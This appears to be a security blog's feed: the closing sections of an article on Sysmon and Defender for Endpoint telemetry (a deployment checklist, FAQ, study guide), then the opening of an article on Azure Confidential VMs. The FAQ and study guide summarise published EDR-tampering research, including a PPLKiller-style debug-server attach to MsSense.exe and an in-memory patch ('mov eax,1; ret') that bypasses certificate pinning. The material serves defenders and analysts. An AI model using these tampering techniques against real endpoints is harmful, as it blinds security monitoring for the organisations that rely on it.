&lt;p&gt;Hartong&apos;s config is the community answer to the question &quot;what Sysmon EIDs should I emit on a host that already has MDE?&quot; There is no Microsoft-published reference equivalent. This is the most surgical near-term improvement Microsoft could make. Publishing such a config -- even as a starting-point template, not a binding recommendation -- would compress an entire detection-engineering conversation into a single endorsed artifact. The political reason it has not happened is partly that Microsoft does not officially recommend running Sysmon alongside MDE; the operational reality is that detection-engineering-mature shops do anyway.&lt;/p&gt;
&lt;h3&gt;Cross-platform parity&lt;/h3&gt;
&lt;p&gt;Sysmon for Linux (&lt;code&gt;microsoft/SysmonForLinux&lt;/code&gt;, created October 28, 2020 and publicly announced in October 2021) ships an eBPF-based implementation of the same XML schema and emits to syslog [@github-sysmon-linux]. It is a substantial subset of the Windows manifest -- process create, file write, network connect, image load, raw access read -- with the cross-OS shared XML rule grammar going for it, so a detection-engineering team can write one Sigma-aligned rule and run it against both Windows and Linux endpoints with minor token substitutions. Full parity between the Windows kernel-callback Sysmon and the Linux eBPF Sysmon is &lt;em&gt;not&lt;/em&gt; the design intent; the Linux port intentionally captures only the EIDs that map cleanly onto eBPF observables. &lt;code&gt;BTFHub&lt;/code&gt; plus &lt;code&gt;SysinternalsEBPF&lt;/code&gt; (the in-tree CO-RE infrastructure the Linux port uses) make per-kernel-version deployments tractable, but the field has not yet converged on a single canonical Linux config the way it converged on SwiftOnSecurity for Windows.&lt;/p&gt;
&lt;p&gt;These five open problems are where the field will move in the next five years. In the meantime, what does the analyst do on Monday morning?&lt;/p&gt;
&lt;h2&gt;14. Seven Things to Do Monday Morning&lt;/h2&gt;
&lt;p&gt;Everything above has been background. Here is the operational checklist. Each step is anchored to a primary citation. Walk all seven on a single non-production host before fleet rollout; the ninety-second triage walk from §1 is best learned by reproducing it once on your own tenant.&lt;/p&gt;
&lt;h3&gt;1. Verify the MDE sensor service is healthy&lt;/h3&gt;
&lt;p&gt;Run as Administrator on the endpoint:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sc query sense
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A healthy result shows &lt;code&gt;STATE: 4 RUNNING&lt;/code&gt; and &lt;code&gt;WIN32_EXIT_CODE: 0&lt;/code&gt;. If the result is &lt;code&gt;STATE: 1 STOPPED&lt;/code&gt; or the service is missing entirely, consult the WDATPOnboarding event source in the Application event log for events 5, 10, 15, 30, 35, 40, 65, and 70 -- each has a documented resolution procedure [@sense-troubleshoot]. On Windows Server 2019, 2022, 2025, or Azure Stack HCI 23H2 or later, also verify the Feature on Demand is installed:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DISM.EXE /Online /Get-CapabilityInfo /CapabilityName:Microsoft.Windows.Sense.Client~~~~
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The result should show &lt;code&gt;State : Installed&lt;/code&gt; and &lt;code&gt;Version : 10.x.x.x&lt;/code&gt;. If &lt;code&gt;State : NotPresent&lt;/code&gt;, install the FoD before proceeding.&lt;/p&gt;
&lt;h3&gt;2. Open Advanced Hunting and run the §8 query&lt;/h3&gt;
&lt;p&gt;Navigate to &lt;code&gt;defender.microsoft.com&lt;/code&gt; (or the legacy &lt;code&gt;security.microsoft.com&lt;/code&gt;), expand &lt;strong&gt;Hunting &amp;gt; Advanced hunting&lt;/strong&gt;, paste the §8 KQL query, and run it [@advanced-hunting-overview]. On a fresh tenant the query may return zero rows -- that is the correct result for a healthy environment. Tighten the time window if it is slow (&lt;code&gt;Timestamp &amp;gt; ago(1h)&lt;/code&gt; instead of &lt;code&gt;ago(24h)&lt;/code&gt;) until the query returns within ten seconds. The point of this step is to confirm the read surface is reachable and that the user has Hunter (or higher) RBAC permission on the tenant.&lt;/p&gt;
&lt;h3&gt;3. If licensed for Sentinel, install the Defender XDR connector&lt;/h3&gt;
&lt;p&gt;In the Microsoft Sentinel workspace, navigate to &lt;strong&gt;Data connectors&lt;/strong&gt;, choose &lt;strong&gt;Microsoft Defender XDR&lt;/strong&gt;, and configure per-table streaming [@sentinel-xdr-connector]. Pick the tables your team needs longer retention or analytics-rule scheduling on; leave the others to in-portal Advanced Hunting. Be aware that enabling the connector &quot;&lt;em&gt;automatically disconnects&lt;/em&gt;&quot; any legacy Microsoft Defender component connectors during enablement; this is the cleanup detail to plan for during migration windows [@sentinel-xdr-connector].&lt;/p&gt;
&lt;h3&gt;4. If deploying Sysmon alongside MDE, start from the augment config&lt;/h3&gt;
&lt;p&gt;Clone &lt;code&gt;olafhartong/sysmon-modular&lt;/code&gt;, build the &lt;code&gt;sysmonconfig-mde-augment.xml&lt;/code&gt; variant, and deploy with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Sysmon64.exe -accepteula -i sysmonconfig-mde-augment.xml
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Verify the active configuration with &lt;code&gt;Sysmon64.exe -c&lt;/code&gt; and confirm the rule count matches the augment config&apos;s expected output [@github-hartong-modular].&lt;/p&gt;
&lt;h3&gt;5. If deploying Sysmon standalone, start from NextronSystems or modular default&lt;/h3&gt;
&lt;p&gt;For air-gapped or unlicensed environments, clone &lt;code&gt;NextronSystems/sysmon-config&lt;/code&gt; (the post-2021-rename successor to &lt;code&gt;Neo23x0/sysmon-config&lt;/code&gt;) and deploy &lt;code&gt;sysmonconfig.xml&lt;/code&gt; or, for the blocking-rule variant, &lt;code&gt;sysmonconfig-export-block.xml&lt;/code&gt; [@github-neo23x0][@github-nextronsystems-meta]. Alternatively, &lt;code&gt;olafhartong/sysmon-modular&lt;/code&gt;&apos;s default &lt;code&gt;sysmonconfig.xml&lt;/code&gt; (built from the modular library) is the right choice if you want fine-grained per-technique tuning later [@github-hartong-modular].&lt;/p&gt;
&lt;h3&gt;6. Verify Sysmon v15.2 or later is running&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;Sysmon64.exe -c
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The output&apos;s header line should show the binary version. Anything &lt;code&gt;v15.x&lt;/code&gt; or later has the protected-process gate enabled [@sysmon-ms-learn][@bleepingcomputer-sysmon15]. Anything older is trivially blindable by a SYSTEM-privilege attacker and is the single biggest deployment-hygiene risk in the Sysmon population today.&lt;/p&gt;
&lt;h3&gt;7. Audit the MDE onboarding registry hives&lt;/h3&gt;
&lt;p&gt;Compare the live registry values to the expected onboarding state:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;reg query &quot;HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection&quot;
reg query &quot;HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Unexpected changes -- particularly a change to the onboarding &lt;code&gt;OrgId&lt;/code&gt; or to the policy-controlled &lt;code&gt;Disabled&lt;/code&gt; value -- are an indicator that the tenant or device has been re-targeted, possibly by an attacker who obtained admin-level access and is attempting to re-route the endpoint&apos;s telemetry to a different tenant or to disable the MDE sensor entirely [@sense-troubleshoot]. Set up a Sentinel detection rule on &lt;code&gt;DeviceRegistryEvents&lt;/code&gt; with &lt;code&gt;RegistryKey contains &quot;Windows Advanced Threat Protection&quot;&lt;/code&gt; to surface this class of tampering automatically.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Walk steps 1 and 2 on a single non-production host before fleet rollout. The ninety-second-triage walk you saw in §1 is best learned by reproducing it once on your own tenant. The cost of getting steps 4-6 wrong (deploying the wrong Sysmon config on a high-volume server fleet) is hours of operational pain; the cost of doing them right on a single test host first is twenty minutes.&lt;/p&gt;
&lt;/blockquote&gt;

The MDE sensor service has not been onboarded on this host. Two common causes: (1) the endpoint is on a Windows Server SKU and the SENSE Feature on Demand has not been installed; run the DISM `Get-CapabilityInfo` check in step 1 to confirm. (2) The onboarding script (the `WindowsDefenderATPLocalOnboardingScript.cmd` or the equivalent Group Policy / Intune / SCCM artifact) has not been run on this host. The MDE settings page in the Defender XDR portal shows the per-device onboarding artifacts under **Settings &amp;gt; Endpoints &amp;gt; Onboarding** for download [@sense-troubleshoot].
&lt;p&gt;The Defender XDR portal also exposes a &lt;strong&gt;device timeline&lt;/strong&gt; view that surfaces a chronological event stream per device without requiring KQL. This is the right view for analysts who are still learning the schema; the KQL surface is the right view for repeatable hunts and detection-rule authoring.&lt;/p&gt;
&lt;p&gt;Seven steps, one Monday. The rest of the questions are in the FAQ.&lt;/p&gt;
&lt;h2&gt;15. Frequently Asked Questions&lt;/h2&gt;
&lt;p&gt;Seven of the questions that come up every time this material is taught.&lt;/p&gt;


Yes on its output side; mostly no on its input side. Sysmon publishes its events through an ETW provider called `Microsoft-Windows-Sysmon`, which is how downstream collectors and the Windows Event Log service consume the data. On its *input* side, Sysmon is a kernel driver that collects via five different mechanisms -- `PsSetCreateProcessNotifyRoutineEx` for process create and exit, `PsSetLoadImageNotifyRoutine` for image load and driver load, `PsSetCreateThreadNotifyRoutineEx` for remote-thread creation, `ObRegisterCallbacks` for cross-process access, `CmRegisterCallbackEx` for registry, and Filter Manager minifilters for ordinary file system and NPFS named pipes. Two exceptions live on Sysmon&apos;s input side. The single kernel-ETW consumer is `Microsoft-Windows-DNS-Client` for EID 22 DNSEvent; the WmiEvent family (EIDs 19-21) is implemented in a consumer style against the WMI activity provider&apos;s user-mode tracing surface. Calling Sysmon &quot;ETW-based&quot; without that distinction is the most common architectural confusion in the field [@sysmon-ms-learn].

For most organizations licensed for MDE Plan 2 and without a mature detection-engineering team, yes -- MDE alone is the right baseline. For organizations with a detection-engineering team, the community pattern is to deploy MDE *plus* a tuned Sysmon configuration (specifically Olaf Hartong&apos;s `sysmonconfig-mde-augment.xml`) that fills the gaps where MDE&apos;s `Device*` schema truncates or omits fields that Sysmon&apos;s manifest captures verbatim -- the `ProcessAccess` GrantedAccess mask, the full WMI consumer expressions, RawAccessRead, the pipe events, and selected file-delete archival paths. The wrong answer for an MDE-licensed shop with a detection-engineering team is to do nothing on the Sysmon side; the second-wrong answer is to deploy *default* Sysmon alongside MDE, which produces double the telemetry volume for the coverage of one [@github-hartong-modular][@mde-ms-learn].

The five class-specific `Device*` tables (`DeviceProcessEvents`, `DeviceNetworkEvents`, `DeviceFileEvents`, `DeviceImageLoadEvents`, `DeviceRegistryEvents`) each map onto a single Sysmon EID family and present a normalized, per-class set of columns. `DeviceEvents` is the miscellaneous catch-all: AMSI scan results, exploit-protection events, Defender Antivirus operational events, Attack Surface Reduction rule fires, Network Protection blocks, OpenProcess API calls, and other MDE-specific telemetry surface here under different `ActionType` values. If a row&apos;s `ActionType` does not match what you expected, the row is probably in `DeviceEvents` rather than the table you searched first [@advanced-hunting-overview].

No. The historical root is SwiftOnSecurity&apos;s `sysmon-config`, created on February 1, 2017 per the GitHub REST API [@github-swiftonsecurity-meta]. Florian Roth (`@Neo23x0`) forked SwiftOnSecurity&apos;s repository in January 2018 and added blocking-rule support, community pull-request merges, and the maintainer roster that now includes Tobias Michalski, Christian Burkard, and Nasreddine Bencherchali [@github-neo23x0]. The Neo23x0 repository was renamed to `NextronSystems/sysmon-config` on July 24, 2021 [@github-nextronsystems-meta]; the old URL HTTP-301 redirects to the new one and the content lineage from SwiftOnSecurity is unchanged. Calling Roth&apos;s config &quot;the original&quot; is the inverse of the truth; calling it &quot;the canonical actively-maintained fork&quot; is closer.

No. Sysmon supports one active configuration at a time. There is no aggregate-multiple-XMLs feature at the driver layer. Olaf Hartong&apos;s modular workflow generates a single merged XML at build time from a per-technique module library; the production fleet receives that single XML and the driver enforces it. If you want two configurations -- one for the SOC team&apos;s hunting, one for the platform team&apos;s audit -- merge the rules at build time and ship the combined product [@github-hartong-modular].

Because it runs as Antimalware Protected Process Light (`PROTECTED_ANTIMALWARE_LIGHT`), the Windows kernel rejects ordinary user-mode `OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_DUP_HANDLE)` requests against the process from any caller that does not itself run at an equal or higher signer level. The published reverse-engineering technique (FalconForce 2022) is to raise the Windows PE debug server `dbgsrv.exe` to the `WinTcb` signer level via a PPLKiller-class kernel primitive, then attach the elevated debug server to `MsSense.exe`. That technique requires a kernel-mode primitive (commonly a BYOVD chain), which is itself non-trivial. The protection level is the structural defense; the debug-server technique is the dispositive community workaround [@falconforce-2022].

Thirty days of raw data in the Defender XDR portal: &quot;*Advanced hunting is a query-based threat hunting tool that you use to explore up to 30 days of raw data*&quot; [@advanced-hunting-overview]. Beyond thirty days, retention is configurable per workspace via the Microsoft Sentinel Defender XDR connector; the Log Analytics workspace archive tier supports up to twelve years of per-table archive on a per-GB-billed basis [@sentinel-xdr-connector][@ms-log-analytics-archive]. The two surfaces are not exclusive; the common operational pattern is in-portal for the hunting team (30 days, no per-GB cost) plus per-table Sentinel streaming for the analytics-rules team (extended retention, per-GB cost on selected tables).

&lt;p&gt;These are the questions. The seven layers between Maya&apos;s &lt;code&gt;cmd.exe&lt;/code&gt; at 9:14 a.m. and her Kusto row at 9:14:03 are how the answers actually work -- a kernel callback, a user-mode aggregator, an ETW publisher or TLS-pinned cloud forwarder, a regional Kusto ingest, a table write, and a KQL read, with two structural defenses (Antimalware-PPL and the Sysmon v15 protected-process gate) keeping each layer honest. Every other detection-engineering pattern in the Windows field is a configuration of those seven layers, and most of the open problems are at the seams between them.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;See also.&lt;/strong&gt; The Sysmon driver&apos;s collection layer leans on the kernel-callback APIs documented in the &lt;a href=&quot;https://paragmali.com/blog/&quot; rel=&quot;noopener&quot;&gt;Windows process mitigations and Object Manager namespace&lt;/a&gt; articles in this series. The ETW transport bus that Sysmon publishes onto -- and that &lt;code&gt;EtwTi&lt;/code&gt; security events surface through -- is the subject of the dedicated ETW article in this series; the article goes deeper on provider GUIDs, manifests, and the eight-trace-session manifest-provider cap that bounds Sysmon&apos;s coexistence story in §10. The AMSI primary path that produces &lt;code&gt;DeviceEvents&lt;/code&gt; &lt;code&gt;ActionType = &quot;AmsiScriptDetection&quot;&lt;/code&gt; is the subject of the AMSI article; the two pipelines are siblings, not substitutes. And the Sigma rule corpus that compiles down into KQL for Defender XDR / Sentinel hunting is the same Sigma corpus that compiles into Splunk SPL and Elastic EQL -- the vendor-neutral query layer that sits above this article&apos;s KQL surface [@github-sigma].&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;sysmon-and-defender-for-endpoint-the-production-edr-telemetry-pipeline&quot; keyTerms={[
  { term: &quot;Sysmon&quot;, definition: &quot;Sysinternals tool by Russinovich and Garnier (August 2014, latest v15.2 March 2026) that uses Windows kernel callbacks plus a Filter Manager minifilter to collect 29 event types and publishes them via the Microsoft-Windows-Sysmon ETW provider to the Operational event log.&quot; },
  { term: &quot;Microsoft Defender for Endpoint (MDE)&quot;, definition: &quot;Microsoft&apos;s commercial cloud-correlated EDR. Renamed from Windows Defender ATP in September 2020. Runs as the Sense service (MsSense.exe) at Antimalware-PPL, shares the WdBoot ELAM and WdFilter minifilter substrate with Defender Antivirus, and lands events in the Advanced Hunting Kusto cluster.&quot; },
  { term: &quot;Microsoft Defender XDR&quot;, definition: &quot;The November 2023 rename of Microsoft 365 Defender. The unified portal at defender.microsoft.com that exposes Advanced Hunting on the Device* tables plus the cross-domain entity tables (AlertInfo, EmailEvents, IdentityLogonEvents, CloudAppEvents).&quot; },
  { term: &quot;Advanced Hunting&quot;, definition: &quot;The KQL-on-Device*-tables threat-hunting surface in Microsoft Defender XDR. 30 days of raw data, six core tables, the cross-domain entity table set, and a 100,000-row + 10-minute per-query quota.&quot; },
  { term: &quot;ProcessGuid&quot;, definition: &quot;Sysmon&apos;s per-process 128-bit GUID that survives PID reuse and uniquely identifies a process across its lifetime. The canonical join key for process-tree reconstruction.&quot; },
  { term: &quot;Antimalware-PPL&quot;, definition: &quot;Protected Process Light at the PROTECTED_ANTIMALWARE_LIGHT signer level. Prevents user-mode debugger attach, code injection, and OpenProcess-for-write from any caller not at an equal or higher PPL level. Gates MsSense.exe and Sysmon v15+.&quot; },
  { term: &quot;ELAM&quot;, definition: &quot;Early-Launch Antimalware. The Windows boot-order privilege that lets an Antimalware-EKU-signed driver (1.3.6.1.4.1.311.61.4.1) load before any non-ELAM driver and gate which non-ELAM drivers load. WdBoot.sys is ELAM; SysmonDrv.sys is not.&quot; },
  { term: &quot;DeviceProcessEvents&quot;, definition: &quot;The canonical reader-side Kusto table for MDE process-create events. ~50 columns including the InitiatingProcess* parent-process family. The MDE analogue of Sysmon EID 1.&quot; },
  { term: &quot;DeviceEvents&quot;, definition: &quot;The miscellaneous catch-all Kusto table. AMSI scan results, exploit-protection events, ASR rule fires, OpenProcess API calls, and other MDE-specific events surface here under ActionType discriminators.&quot; },
  { term: &quot;Sysmon EID 27 FileBlockExecutable&quot;, definition: &quot;Sysmon v14&apos;s (August 2022) first preventive event. The minifilter intercepts the file-handle close; if the rule matches and the content carries an MZ/PE header, Sysmon logs EID 27 and marks the file for deletion. The copy command produces no error and appears to succeed -- the file is then deleted at handle-close. Confined preventive surface; not a general-purpose application allowlist.&quot; },
  { term: &quot;sysmonconfig-mde-augment.xml&quot;, definition: &quot;Olaf Hartong&apos;s pre-generated Sysmon configuration that drops the EIDs MDE covers (1, 3, 7, 11, 12-14, 22) and keeps the EIDs MDE truncates or omits (8, 9, 10 verbose, 15, 17-18, 19-21, 23 archive). The detection-engineering-community default for MDE coexistence.&quot; },
  { term: &quot;FalconForce 2022 / CVE-2022-23278&quot;, definition: &quot;The dispositive published reverse-engineering of MsSense.exe debug techniques (dbgsrv.exe at WinTcb PPL via PPLKiller) and the disclosed cloud spoofing vulnerability patched by Microsoft on March 8 2022.&quot; },
  { term: &quot;InfoGuard Labs 2025&quot;, definition: &quot;The follow-on reverse-engineering of MDE cloud authorization. In-memory patch of CRYPT32!CertVerifyCertificateChainPolicy (mov eax,1; ret) to bypass certificate pinning, followed by disclosure of missing-authentication on /edr/commands/cnc and /senseir/v1/actions/ endpoints. MSRC classified low severity; no fix committed.&quot; }
]} questions={[
  { q: &quot;Why is calling Sysmon &apos;ETW-based&apos; only half-true?&quot;, a: &quot;ETW is Sysmon&apos;s *output* bus (Microsoft-Windows-Sysmon ETW provider feeding the user-mode service and downstream collectors), not its primary *input* source. Sysmon&apos;s driver collects via kernel callbacks: PsSetCreateProcessNotifyRoutineEx, PsSetLoadImageNotifyRoutine, PsSetCreateThreadNotifyRoutineEx, ObRegisterCallbacks(PsProcessType), CmRegisterCallbackEx, and Filter Manager minifilters (covering both ordinary file system and NPFS named pipes). Two input-side ETW-consumer exceptions exist: Microsoft-Windows-DNS-Client for EID 22 DNSEvent, and the WMI activity provider for EIDs 19-21 WmiEvent.&quot; },
  { q: &quot;Why does Hartong&apos;s sysmonconfig-mde-augment.xml exist as a community artifact rather than a Microsoft-published reference?&quot;, a: &quot;Microsoft does not publish a per-ActionType-to-per-kernel-callback cross-walk for the MDE EDR sensor. The community knows the Device* reader-side schema and the user-mode component inventory (Sense, MsSense.exe, SenseCncProxy.exe, SenseIR.exe, SenseNdr.exe), but not the kernel-callback inventory. Hartong reverse-engineered which Sysmon EIDs MDE truncates or omits and built the augment config to fill the gap.&quot; },
  { q: &quot;What architectural change does Sysmon v15 (June 2023) introduce, and what attack class does it close?&quot;, a: &quot;Sysmon v15 runs the user-mode service as PROTECTED_ANTIMALWARE_LIGHT, disallowing a wide range of user-mode interactions. The closed attack class is the SYSTEM-privilege user-mode tamper surface: sc stop, wevtutil clear of the Operational log, code injection into Sysmon.exe, ordinary debugger attach, and OpenProcess(PROCESS_TERMINATE). The residual attack surface is kernel-mode primitives, typically delivered via BYOVD.&quot; },
  { q: &quot;Where in the seven-layer pipeline does FalconForce 2022 intercept Defender for Endpoint?&quot;, a: &quot;Between layers 2 and 4. FalconForce raised dbgsrv.exe to WinTcb PPL (defeating layer 2&apos;s Antimalware-PPL protection on MsSense.exe), attached the elevated debug server to MsSense, and instrumented SspiCli!EncryptMessage to capture plaintext payloads before the TLS-with-cert-pinning transport (layer 4) ran. The plaintext capture surfaced CVE-2022-23278, which Microsoft patched March 8 2022.&quot; },
  { q: &quot;What are the four structural ceilings the EDR pipeline cannot lift?&quot;, a: &quot;(1) The pre-driver-load horizon: events before the EDR driver&apos;s DriverEntry are invisible; the ELAM boundary is the upstream bound. (2) The observation-vs-enforcement latency gap: Sysmon kernel-callback to event-log is sub-ms; MDE end-to-end to Kusto is seconds. (3) MDE schema truncation: ProcessAccess GrantedAccess masks, WMI consumer expressions, RawAccessRead, and PipeEvent are not surfaced in the Device* tables verbatim. (4) The kernel-mode adversary primitive: an attacker with a kernel write capability defeats HVCI + VBL + PPL + ELAM as a consequence of defeating the defenses themselves.&quot; },
  { q: &quot;Which Sysmon configuration is the correct starting point for a new deployment?&quot;, a: &quot;Depends on the deployment posture. For air-gapped / regulatory-no-cloud / unlicensed: NextronSystems/sysmon-config or olafhartong/sysmon-modular&apos;s default sysmonconfig.xml. For MDE-licensed environments with a detection-engineering team: olafhartong/sysmon-modular&apos;s sysmonconfig-mde-augment.xml. For MDE-licensed environments without a detection-engineering team: do not deploy Sysmon -- run MDE alone. The wrong starting point in any context is default Sysmon alongside MDE without the augment config.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows</category><category>edr</category><category>sysmon</category><category>defender-for-endpoint</category><category>etw</category><category>threat-hunting</category><category>kql</category><category>detection-engineering</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Inside Azure Confidential VMs: SEV-SNP, Intel TDX, and the Paravisor that Makes Them a Cloud Product</title><link>https://paragmali.com/blog/inside-azure-confidential-vms-sev-snp-intel-tdx-and-the-para/</link><guid isPermaLink="true">https://paragmali.com/blog/inside-azure-confidential-vms-sev-snp-intel-tdx-and-the-para/</guid><description>Azure Confidential VMs combine AMD SEV-SNP and Intel TDX with the OpenHCL paravisor and MAA policy v1.2. A textbook tour from silicon to relying party.</description><pubDate>Wed, 13 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Azure Confidential VMs are Windows or Linux guests that the cloud operator&apos;s hypervisor cannot read or silently modify.** They are built on two distinct CPU primitives -- AMD SEV-SNP (Reverse Map Table + Virtual Machine Privilege Level + SNP_REPORT) and Intel TDX (Secure Arbitration Mode + the signed TDX Module + RTMR0-3) -- and wrapped on Azure by the open-source Rust paravisor OpenHCL running inside the trust boundary at VMPL0 or the L1 TD seat.&lt;p&gt;Inside that boundary the paravisor synthesises a vTPM whose quotes chain to the SEV-SNP or TDX hardware report, and Microsoft Azure Attestation runs a customer-defined policy v1.2 file (with JmesPath claim rules) against the evidence to release HSM-backed keys via Secure Key Release.&lt;/p&gt;
&lt;p&gt;The Generation-2 integrity rail closes the SEVered and SEVurity ciphertext-remapping class architecturally, but four 2024-era papers (CacheWarp, WeSee, Heckler, Ahoi) demonstrate that side-channel and notification-injection seams remain. Read this if you need to draw the Azure CVM stack from silicon to MAA, decide between SEV-SNP and TDX SKUs, and write an attestation policy that says exactly what you mean.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h2&gt;1. Even the cloud operator must not see your memory&lt;/h2&gt;
&lt;p&gt;A Windows Server VM is running a SQL query on Azure right now. It is joining a million-row variant table against a patient-genome reference, building an index in RAM, and serving the answer back to a clinician&apos;s web portal. The customer who owns that VM has every reason to want the query to succeed and every reason to make sure that nobody else can ever read the index it builds: not the hypervisor it runs on, not the host firmware below it, not the Microsoft engineer holding the on-call pager, not even a court-ordered datacentre raid carried out with full physical access to the rack.&lt;/p&gt;
&lt;p&gt;As of 2026, that is not a thought experiment. It is the contract Azure signs when you provision a &lt;code&gt;DCasv5&lt;/code&gt; or &lt;code&gt;DCesv5&lt;/code&gt; confidential VM [@msdocs-overview-products]. And the contract has a shape -- an architecturally enforced shape rooted in two distinct CPU mechanisms, wrapped in an open-source Rust paravisor [@openhcl-blog], verified by a policy-driven attestation service [@msdocs-maa-overview], and dented by four published 2024 attacks that this article will name in order.&lt;/p&gt;
&lt;p&gt;The Confidential Computing Consortium defines the contract in one sentence: &quot;Confidential Computing protects data in use by performing computation in a hardware-based, attested Trusted Execution Environment&quot; [@ccc-about]. That sentence finishes a longer thought. Data at rest gets BitLocker and full-disk encryption. Data in transit gets TLS. Data in use -- the gigabytes that sit in DRAM while a process actually computes against them -- has historically been the unencrypted leg of a three-legged stool.&lt;/p&gt;

A virtual machine whose memory and CPU state are cryptographically protected from the host hypervisor and the cloud operator&apos;s infrastructure, and whose configuration is bound to a hardware-rooted attestation report a remote verifier can check. The Confidential Computing Consortium&apos;s framing is the canonical one: &quot;These secure and isolated environments prevent unauthorized access or modification of applications and data while in use&quot; [@ccc-about].

A computing environment whose confidentiality, integrity, and attestability are enforced by hardware mechanisms below the level of the operating system. A TEE may be process-scoped (Intel SGX enclaves), VM-scoped (AMD SEV-SNP, Intel TDX), or board-scoped (AWS Nitro Enclaves). The Confidential VM is the VM-scoped specialisation.
&lt;p&gt;Three concrete workloads make the contract operationally legible. A regulated clean room running joint analytics over patient genomes between an academic medical centre and a pharmaceutical sponsor, where the contract literally forbids the sponsor&apos;s staff from reading raw genotypes. A multi-party anti-money-laundering analytic between two competing banks who will share encrypted features but not raw transactions. A sovereign-cloud control plane that must not leak to the hyperscaler&apos;s host kernel under any subpoena. In each case the threat model treats the cloud operator as semi-trusted at best and adversarial at worst, and in each case the customer wants the cipher engine to live below the operator&apos;s reach.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Encryption at rest hides bytes on storage. Encryption in transit hides bytes on the wire. Encryption in use is the missing third leg -- the one that asks the cipher engine to live inline with the memory controller, so that a VM&apos;s working set never appears in plaintext to anyone but the VM itself. That is what AMD SEV-SNP and Intel TDX do at the silicon layer, and what Azure productises with the OpenHCL paravisor and Microsoft Azure Attestation [@ccc-about; @msdocs-azure-cvm].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The architecture that makes this contract real takes vocabulary from Internet standards as well as silicon. RFC 9334, published in January 2023, gives us the verifier / evidence / relying party language we will use throughout the article [@rfc9334]. An &lt;em&gt;attester&lt;/em&gt; (the guest VM plus the paravisor) generates &lt;em&gt;evidence&lt;/em&gt; (a hardware attestation report plus a vTPM quote). A &lt;em&gt;verifier&lt;/em&gt; (Microsoft Azure Attestation in Azure&apos;s case) checks the evidence against a policy and emits an &lt;em&gt;attestation result&lt;/em&gt; (a signed JWT). A &lt;em&gt;relying party&lt;/em&gt; (Azure Key Vault, or any customer service) consumes the result and decides whether to release a secret. The article you are reading is, at heart, a tour of how a SEV-SNP or TDX guest, an OpenHCL paravisor, and Microsoft Azure Attestation realise that abstract diagram on commodity silicon.&lt;/p&gt;
&lt;p&gt;That leads to the obvious question. How can a CPU enforce that even the hypervisor cannot read RAM? And once it can, why does a single mechanism turn out to be insufficient -- why does the architecture need a separate integrity rail on top? The next two sections trace the wrong answers that came first.&lt;/p&gt;
&lt;h2&gt;2. Why enclaves were not enough&lt;/h2&gt;
&lt;p&gt;In August 2016 David Kaplan stood on the USENIX Security stage in Austin and described &quot;two new x86 ISA features developed by AMD&quot; that he called &quot;the first general-purpose memory encryption features to be integrated into the x86 architecture&quot; [@usenix-kaplan-2016]. Kaplan was, in the conference biography&apos;s words, the &quot;lead architect for the AMD memory encryption features&quot; [@usenix-kaplan-2016]. His argument was deceptively simple. An enclave that lives inside a single process is the wrong unit of confidential computation for a cloud workload. The workloads customers actually run -- database engines, analytic services, language runtimes -- want gigabytes of working memory, multiple threads, and an unmodified operating system. None of that fits inside a roughly 96-MiB SGX enclave [@costan-devadas-2016].&lt;/p&gt;
&lt;p&gt;Two design ancestors set the shape of the problem before either AMD or Intel solved it.&lt;/p&gt;
&lt;p&gt;The first ancestor is the Trusted Platform Module. The TCG TPM specification dates back to 2003, when &quot;the first TPM version that was deployed was 1.1b&quot; [@wiki-tpm]. TPM 2.0 was announced on April 9, 2014 [@wiki-tpm] and standardised as ISO/IEC 11889. The TPM contributed three concepts that remain load-bearing two decades later: &lt;em&gt;platform configuration registers&lt;/em&gt; (the extend-only PCR digests that a measured-boot chain builds), &lt;em&gt;attestation identity keys&lt;/em&gt;, and a &lt;em&gt;quote&lt;/em&gt; operation that signs PCR state with a key whose origin a remote verifier can trust. The TPM is not a TEE in the modern sense -- it does not host computation -- but it is the first widely deployed device that lets a remote party gain cryptographic assurance about what a machine is running. Every confidential VM design ships a TPM-shaped attestation surface inside it.&lt;/p&gt;
&lt;p&gt;The second ancestor is Intel Software Guard Extensions. Designed at the HASP 2013 workshop and delivered on Skylake in 2015 [@costan-devadas-2016], SGX introduced the &lt;em&gt;enclave&lt;/em&gt;: a process-scoped TEE backed by the Enclave Page Cache, a CPU-managed memory region whose contents are decrypted only inside the cache. Programs enter and leave through &lt;code&gt;ENCLU&lt;/code&gt;-family instructions; cross-domain calls use a partitioned model called &lt;code&gt;ECALL&lt;/code&gt; / &lt;code&gt;OCALL&lt;/code&gt;; remote attestation is mediated by Intel through a quoting enclave. SGX worked, in the strict sense that the threat model included even a malicious operating system. But three things kept it from generalising.&lt;/p&gt;

A CPU-protected DRAM region that holds an SGX enclave&apos;s working memory in encrypted, integrity-checked form. On early Skylake / Kaby Lake parts the EPC was capped at approximately 128 MiB physical with between ~93 and 96 MiB usable depending on BIOS reservation after reserved EPCM metadata accounting [@costan-devadas-2016]. Anything beyond the cap paged through the encrypted-page-eviction path with a substantial performance cliff, which is one of the architectural reasons SGX did not generalise to whole-VM cloud workloads.
